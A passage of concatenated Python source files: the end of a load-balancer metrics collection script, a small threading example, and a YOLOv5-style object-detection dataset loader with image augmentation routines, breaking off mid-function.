for p in proc:
p.join()
total_time = str(time.time()-start_time)
print(str(datetime.now())+' AVI_SCRIPT: metric script has completed, executed in '+total_time+' seconds')
#----- START SCRIPT EXECUTION
#----- check for docker environment Variable
#----- if docker environment, runs as while loop
if 'EN_DOCKER' in os.environ:
fdir = os.path.abspath(os.path.dirname(__file__))
configuration = False
global_endpoint_config = None
if 'EN_CONFIGURATION' in os.environ:
try:
import yaml
configuration = yaml.safe_load(os.environ['EN_CONFIGURATION'].replace('\t',' '))
with open('configuration.bak', 'w') as yaml_file:
yaml.dump(configuration, yaml_file, default_flow_style=False)
except:
print(str(datetime.now())+' Error with Provided Configuration YAML')
exception_text = traceback.format_exc()
print(str(datetime.now())+' : '+exception_text)
sys.exit(1)
while True:
loop_start_time = time.time()
avi_controller_list = configuration['controllers']
if 'metrics_endpoint_config' in configuration:
global_endpoint_config = configuration['metrics_endpoint_config']
main()
loop_total_time = time.time()-loop_start_time
if loop_total_time < 60:
print(str(datetime.now())+' AVI_SCRIPT: sleeping for '+str(60 - datetime.now().second)+' seconds')
time.sleep(60 - datetime.now().second)
else:
print(str(datetime.now())+' No Configuration provided')
else:
#----- Get the file path to import configuration, needed for cron
try:
fdir = os.path.abspath(os.path.dirname(__file__))
configuration = False
global_endpoint_config = None
import yaml
print(fdir)
if os.path.isfile(fdir+'/configuration.yaml') == True:
with open(fdir+'/configuration.yaml', 'r') as yaml_file:
configuration = yaml.safe_load(yaml_file)
#----- Import avi controller info from json file
if 'metrics_endpoint_config' in configuration:
global_endpoint_config = configuration['metrics_endpoint_config']
avi_controller_list = configuration['controllers']
main()
else:
print(str(datetime.now())+' No Configuration provided')
except:
print(str(datetime.now())+' Error with Provided Configuration YAML')
exception_text = traceback.format_exc()
print(str(datetime.now())+' : '+exception_text)
sys.exit(1)
|
start_threads.py
|
import threading
import time
def do_it() -> None:
time.sleep(0.0000001)
print("did it")
thread1 = threading.Thread(target=do_it)
print("getting ready to call start")
thread1.start()
print("some thread independent operation")
thread1.join()
print("done")
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import json
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from tools.general import xyxy2xywh, xywh2xyxy, torch_distributed_zero_first
import yaml
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.tiff', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=0):
# Make sure only the first process in DDP process the dataset first, and the following others can use the cache.
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
rank=rank)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
dataloader = InfiniteDataLoader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn) # torch.utils.data.DataLoader()
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers.
Uses same syntax as vanilla DataLoader.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever.
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640):
p = str(Path(path)) # os-agnostic
p = os.path.abspath(p) # absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception('ERROR: %s does not exist' % p)
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(p, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nf, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nf, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=640):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = str(Path(p)) # os-agnostic
parent = str(Path(p).parent) + os.sep
if os.path.isfile(p): # file
with open(p, 'r') as t:
t = t.read().splitlines()
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
elif os.path.isdir(p): # folder
f += glob.iglob(p + os.sep + '*.*')
else:
raise Exception('%s does not exist' % p)
self.img_files = sorted(
[x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats])
except Exception as e:
raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
# Define labels
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
self.label_files = [x.replace(sa, sb, 1).replace(os.path.splitext(x)[-1], '.txt') for x in self.img_files]
# Check cache
cache_path = str(Path(self.label_files[0]).parent) + '.cache' # cached labels
if os.path.isfile(cache_path):
cache = torch.load(cache_path) # load
if cache['hash'] != get_hash(self.label_files + self.img_files): # dataset changed
cache = self.cache_labels(cache_path) # re-cache
else:
cache = self.cache_labels(cache_path) # cache
# Get labels
labels, shapes = zip(*[cache[x] for x in self.img_files])
self.shapes = np.array(shapes, dtype=np.float64)
self.labels = list(labels)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache labels
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
pbar = enumerate(self.label_files)
if rank in [-1, 0]:
pbar = tqdm(pbar)
for i, file in pbar:
l = self.labels[i] # label
if l is not None and l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
if rank in [-1, 0]:
pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
cache_path, nf, nm, ne, nd, n)
if nf == 0:
s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
print(s)
assert not augment, '%s. Can not train without labels.' % s
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache'):
# Cache dataset labels, check images and read shapes
x = {} # dict
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for (img, label) in pbar:
try:
l = []
image = Image.open(img)
image.verify() # PIL verify
# _ = io.imread(img) # skimage verify (from skimage import io)
shape = exif_size(image) # image size
assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
if os.path.isfile(label):
with open(label, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32) # labels
if len(l) == 0:
l = np.zeros((0, 5), dtype=np.float32)
x[img] = [l, shape]
except Exception as e:
x[img] = [None, None]
print('WARNING: %s: %s' % (img, e))
x['hash'] = get_hash(self.label_files + self.img_files)
torch.save(x, path) # save for next time
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_perspective
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4 = random_perspective(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def replicate(img, labels):
# Replicate labels
h, w = img.shape[:2]
boxes = labels[:, 1:].astype(int)
x1, y1, x2, y2 = boxes.T
s = ((x2 - x1) + (y2 - y1)) / 2 # side length (pixels)
for i in s.argsort()[:round(s.size * 0.5)]: # smallest indices
x1b, y1b, x2b, y2b = boxes[i]
bh, bw = y2b - y1b, x2b - x1b
yc, xc = int(random.uniform(0, h - bh)), int(random.uniform(0, w - bw)) # offset x, y
x1a, y1a, x2a, y2a = [xc, yc, xc + bw, yc + bh]
img[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
labels = np.append(labels, [[labels[i, 0], x1a, y1a, x2a, y2a]], axis=0)
return img, labels
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = (new_shape[1], new_shape[0])
ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_perspective(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, perspective=0.0, border=(0, 0)):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# targets = [cls, xyxy]
height = img.shape[0] + border[0] * 2 # shape(h,w,c)
width = img.shape[1] + border[1] * 2
# Center
C = np.eye(3)
C[0, 2] = -img.shape[1] / 2 # x translation (pixels)
C[1, 2] = -img.shape[0] / 2 # y translation (pixels)
# Perspective
P = np.eye(3)
P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y)
P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x)
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels)
T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels)
# Combined rotation matrix
M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT
if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed
if perspective:
img = cv2.warpPerspective(img, M, dsize=(width, height), borderValue=(114, 114, 114))
else: # affine
img = cv2.warpAffine(img, M[:2], dsize=(width, height), borderValue=(114, 114, 114))
# Visualize
# import matplotlib.pyplot as plt
# ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel()
# ax[0].imshow(img[:, :, ::-1]) # base
# ax[1].imshow(img2[:, :, ::-1]) # warped
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = xy @ M.T # transform
if perspective:
xy = (xy[:, :2] / xy[:, 2:3]).reshape(n, 8) # rescale
else: # affine
xy = xy[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# clip boxes
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
# filter candidates
i = box_candidates(box1=targets[:, 1:5].T * s, box2=xy.T)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def box_candidates(box1, box2, wh_thr=2, ar_thr=20, area_thr=0.1): # box1(4,n), box2(4,n)
# Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio
w1, h1 = box1[2] - box1[0], box1[3] - box1[1]
w2, h2 = box2[2] - box2[0], box2[3] - box2[1]
ar = np.maximum(w2 / (h2 + 1e-16), h2 / (w2 + 1e-16)) # aspect ratio
return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + 1e-16) > area_thr) & (ar < ar_thr) # candidates
def cutout(image, labels):
# Applies image cutout augmentation https://arxiv.org/abs/1708.04552
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
